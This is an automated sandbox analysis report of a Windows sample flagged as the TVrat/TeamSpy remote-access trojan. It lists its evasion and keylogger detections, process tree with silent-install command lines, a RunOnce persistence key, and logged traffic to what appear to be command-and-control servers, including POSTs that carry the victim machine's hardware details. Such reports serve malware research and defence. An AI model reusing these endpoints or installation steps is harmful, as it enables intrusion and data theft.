Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
wjpP1EOX0L.exe

Overview

General Information

Sample name:wjpP1EOX0L.exe
renamed because original name is a hash value
Original sample name:7ea97972b7a7e37bdc6993c7f00830040acf4ce957243abb85d6c1232baf30c0.exe
Analysis ID:1558734
MD5:34dc961fe0a98ea779d7b673a48c77a0
SHA1:7f3cf770da67a60d60c79c82df85eef66eb80d8e
SHA256:7ea97972b7a7e37bdc6993c7f00830040acf4ce957243abb85d6c1232baf30c0
Tags:crypto-st--artexeuser-JAMESWT_MHT
Infos:

Detection

TVrat
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected TVrat
AI detected suspicious sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Tries to delay execution (extensive OutputDebugStringW loop)
Tries to detect virtualization through RDTSC time measurements
AV process strings found (often used to terminate AV products)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries keyboard layouts
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sleep loop found (likely to delay execution)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic

Classification

Process Tree

  • System is w10x64
  • wjpP1EOX0L.exe (PID: 7344 cmdline: "C:\Users\user\Desktop\wjpP1EOX0L.exe" MD5: 34DC961FE0A98EA779D7B673A48C77A0)
    • wjpP1EOX0L.tmp (PID: 7360 cmdline: "C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmp" /SL5="$20476,6422358,121344,C:\Users\user\Desktop\wjpP1EOX0L.exe" MD5: 90FC739C83CD19766ACB562C66A7D0E2)
      • wjpP1EOX0L.exe (PID: 7396 cmdline: "C:\Users\user\Desktop\wjpP1EOX0L.exe" /verysilent /password=uzx1m MD5: 34DC961FE0A98EA779D7B673A48C77A0)
        • wjpP1EOX0L.tmp (PID: 7412 cmdline: "C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp" /SL5="$2047E,6422358,121344,C:\Users\user\Desktop\wjpP1EOX0L.exe" /verysilent /password=uzx1m MD5: 90FC739C83CD19766ACB562C66A7D0E2)
          • cmd.exe (PID: 7788 cmdline: "C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\mo6x\xuwl3fl.bat"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • xcopy.exe (PID: 7836 cmdline: xcopy /Y /I /S "C:\Users\user\AppData\Local\Temp\mo6x\*" "C:\Users\user\AppData\Roaming\im\" MD5: 7E9B7CE496D09F70C072930940F9F02C)
            • ast.exe (PID: 8036 cmdline: "C:\Users\user\AppData\Roaming\im\ast.exe" MD5: 8002D9E5851728EB024B398CF19DE390)
  • ast.exe (PID: 1312 cmdline: "C:\Users\user\AppData\Roaming\im\ast.exe" MD5: 8002D9E5851728EB024B398CF19DE390)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
TeamSpy, TVRATNo Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.teamspy

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\im\ast.exeJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
    C:\Users\user\AppData\Roaming\im\ast.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
      C:\Users\user\AppData\Roaming\im\ast.exeJoeSecurity_TVratYara detected TVratJoe Security
        C:\Users\user\AppData\Local\Temp\mo6x\is-ERH6U.tmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
          C:\Users\user\AppData\Local\Temp\mo6x\is-ERH6U.tmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
            Click to see the 1 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            0000000A.00000000.2386068044.0000000000401000.00000020.00000001.01000000.0000000C.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
              0000000A.00000000.2386068044.0000000000401000.00000020.00000001.01000000.0000000C.sdmpJoeSecurity_TVratYara detected TVratJoe Security
                Process Memory Space: ast.exe PID: 8036JoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                  Process Memory Space: ast.exe PID: 8036JoeSecurity_TVratYara detected TVratJoe Security

                    Unpacked PEs

                    SourceRuleDescriptionAuthorStrings
                    10.0.ast.exe.400000.0.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                      10.0.ast.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                        10.0.ast.exe.400000.0.unpackJoeSecurity_TVratYara detected TVratJoe Security

                          Sigma Signatures

                          Sigma detected: CurrentVersion Autorun Keys Modification
                          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\im\ast.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\im\ast.exe, ProcessId: 8036, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\asg

                          Suricata Signatures

                          No Suricata rule has matched

                          Joe Sandbox Signatures

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Yara detected TVrat
                          Source: Yara matchFile source: 10.0.ast.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000000A.00000000.2386068044.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: ast.exe PID: 8036, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\im\ast.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\mo6x\is-ERH6U.tmp, type: DROPPED
                          AI detected suspicious sample
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 86.3% probability
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeCode function: 10_2_6B8F21A0 CryptHashData,10_2_6B8F21A0
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeCode function: 10_2_6B8F21C0 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,10_2_6B8F21C0
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeCode function: 10_2_6B8F2160 CryptAcquireContextA,CryptCreateHash,10_2_6B8F2160
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeCode function: 10_2_6B8F20A0 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,10_2_6B8F20A0
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeCode function: 10_2_6B8D8010 CryptAcquireContextA,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,10_2_6B8D8010
                          Source: ast.exe, 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_8a9c27f0-a
                          Source: wjpP1EOX0L.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:49825 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:49836 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:49844 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:49852 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:49860 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:49868 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:49884 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:49897 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:49905 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:49913 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:49913 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:49921 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:49940 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:49948 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:49956 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:49964 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:49972 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:49980 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:49989 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50001 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50007 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50018 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50027 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50038 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50046 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50054 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50062 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50071 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50081 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50089 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50098 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50103 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50106 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50109 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50112 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50115 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50118 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50121 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50124 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50127 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50130 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50133 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50136 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50139 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50142 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50145 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50148 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50151 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50154 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50157 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50160 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50163 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50166 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50169 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50172 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50175 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50178 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50181 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50184 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50187 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50190 version: TLS 1.2
                          Source: wjpP1EOX0L.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                          Source: Binary string: D:\ProjectsVS2015\OpenSSL\openssl-1.1.1l\libcrypto-1_1.pdb source: xcopy.exe, 00000009.00000003.2089288252.00000000035B2000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.2999895866.000000006BE30000.00000002.00000001.01000000.00000014.sdmp
                          Source: Binary string: C:\OpenSSL\Temp\openssl-1.0.2u-x32\out32dll\ssleay32.pdb source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385110004.00000000033F8000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: C:\OpenSSL\Temp\openssl-1.0.2u-x32\out32dll\libeay32.pdb source: xcopy.exe, 00000009.00000003.2096546624.00000000033F9000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: D:\ProjectsVS2015\!Ast_SVN\00_Bin\AstRct.pdb source: xcopy.exe, 00000009.00000003.2087883460.00000000033F7000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3002416551.000000006C1CF000.00000002.00000001.01000000.00000011.sdmp, astrct.dll.9.dr
                          Source: Binary string: D:\Projects\Delphi\_Assistant\10_FSTEK_02\00_Bin\Hatls.pdb source: xcopy.exe, 00000009.00000003.2088110800.00000000035D3000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3005322508.000000006C482000.00000002.00000001.01000000.00000010.sdmp
                          Source: Binary string: D:\ProjectsVS2015\!Ast_SVN\00_Bin\libjpeg-turbo-win.pdb source: xcopy.exe, 00000009.00000003.2096624002.000000000341C000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: D:\Projects\Delphi\_Assistant\10_FSTEK_02\00_Bin\Hatls.pdbf source: xcopy.exe, 00000009.00000003.2088110800.00000000035D3000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3005322508.000000006C482000.00000002.00000001.01000000.00000010.sdmp
                          Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: ast.exe, 0000000A.00000002.2999895866.000000006BDC7000.00000002.00000001.01000000.00000014.sdmp
                          Source: Binary string: D:\ProjectsVS2015\!Ast_SVN\00_Bin\AstClient.pdb source: ast.exe, 0000000A.00000002.3007667489.000000006CFB3000.00000002.00000001.01000000.0000000F.sdmp, is-951GK.tmp.3.dr
                          Source: Binary string: D:\ProjectsVS2015\!Ast_SVN\00_Bin\AstRct.pdbM6 source: xcopy.exe, 00000009.00000003.2087883460.00000000033F7000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3002416551.000000006C1CF000.00000002.00000001.01000000.00000011.sdmp, astrct.dll.9.dr
                          Source: Binary string: vcruntime140.i386.pdb source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385212736.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3008128485.000000006F701000.00000020.00000001.01000000.00000015.sdmp
                          Source: Binary string: vcruntime140.i386.pdbGCTL source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385212736.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3008128485.000000006F701000.00000020.00000001.01000000.00000015.sdmp
                          Source: Binary string: D:\ProjectsVS2015\!Ast_SVN\00_Bin\libjpeg-turbo-win.pdb! source: xcopy.exe, 00000009.00000003.2096624002.000000000341C000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: vcomp140.i386.pdbGCTL source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385162742.00000000033F8000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: D:\CFILES\Projects\WinSSL\openssl-1.1.0g\libcrypto-1_1.pdb source: xcopy.exe, 00000009.00000003.2094846139.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, is-VCJTB.tmp.3.dr
                          Source: Binary string: msvcr120.i386.pdb source: xcopy.exe, 00000009.00000003.2097728621.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, msvcr120.dll.9.dr
                          Source: Binary string: D:\ProjectsVS2015\!Ast_SVN\00_Bin\AstClient.pdbe source: ast.exe, 0000000A.00000002.3007667489.000000006CFB3000.00000002.00000001.01000000.0000000F.sdmp, is-951GK.tmp.3.dr
                          Source: Binary string: C:\OpenSSL\Temp\openssl-1.0.2u-x32\out32dll\ssleay32.pdb@W source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385110004.00000000033F8000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: .pdbnes\AppData\Roaming\im\ source: ast.exe, 0000000A.00000002.2978052448.000000000019A000.00000004.00000010.00020000.00000000.sdmp
                          Source: Binary string: D:\ProjectsVS2015\OpenSSL\openssl-1.1.1l\libssl-1_1.pdb@@ source: xcopy.exe, 00000009.00000003.2097505417.0000000003418000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3006758328.000000006CA31000.00000002.00000001.01000000.00000013.sdmp, is-UA1D6.tmp.3.dr
                          Source: Binary string: C:\Users\user\AppData\Roaming\im\ast.pdb\*D{ source: ast.exe, 0000000A.00000002.2978052448.000000000019A000.00000004.00000010.00020000.00000000.sdmp
                          Source: Binary string: vcomp140.i386.pdb source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385162742.00000000033F8000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: D:\ProjectsVS2015\OpenSSL\openssl-1.1.1l\libssl-1_1.pdb source: xcopy.exe, 00000009.00000003.2097505417.0000000003418000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3006758328.000000006CA31000.00000002.00000001.01000000.00000013.sdmp, is-UA1D6.tmp.3.dr
                          Source: Binary string: C:\Users\user\AppData\Roaming\im\ast.pdb source: ast.exe, 0000000A.00000002.2978052448.000000000019A000.00000004.00000010.00020000.00000000.sdmp
                          Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASMOpenSSL 1.1.1l 24 Aug 2021built on: Tue Sep 7 07:24:19 2021 UTCplatform: VC-WIN32OPENSSLDIR: "C:\Program Files (x86)\Common Files\SSL"ENGINESDIR: "C:\Program Files (x86)\OpenSSL\lib\engines-1_1"not availabledes(long) source: ast.exe, 0000000A.00000002.2999895866.000000006BDC7000.00000002.00000001.01000000.00000014.sdmp
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeCode function: 11_2_07065021 lstrcat,FindFirstFileA,lstrcat,FindNextFileA,FindClose,11_2_07065021
                          Source: global trafficTCP traffic: 192.168.2.4:49876 -> 212.193.169.65:44335
                          Source: global trafficTCP traffic: 192.168.2.4:50015 -> 195.19.105.66:44444
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 2691MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.19045) x64
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 2691MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.19045) x64
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 256
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 2561:vKlGnpp1142 104 603p1142 104 603p1142 104 603p1142 104 603p1142 104 603p1p2p4142 104 603p5142 104 603
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 2561:I*K1pp1142 104 603p1142 104 603p1142 104 603p1142 104 603p1142 104 603p1p2p4142 104 603p5142 104 603
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 2561:6otL?:pp1142 104 603p1142 104 603p1142 104 603p1142 104 603p1142 104 603p1p2p4142 104 603p5142 104 603
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 2561:mF$~Wpp1142 104 603p1142 104 603p1142 104 603p1142 104 603p1142 104 603p1p2p4142 104 603p5142 104 603
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
